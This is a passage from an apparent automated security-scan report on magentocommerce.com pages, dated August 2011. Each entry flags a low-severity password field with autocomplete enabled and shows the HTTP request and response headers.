<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.56. http://www.magentocommerce.com/media/interviews  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.57. http://www.magentocommerce.com/media/interviews/alpedia/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.63. http://www.magentocommerce.com/media/interviews/man-junk/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.67. http://www.magentocommerce.com/media/interviews/shoebacca/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.68. http://www.magentocommerce.com/media/interviews/signing-time/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

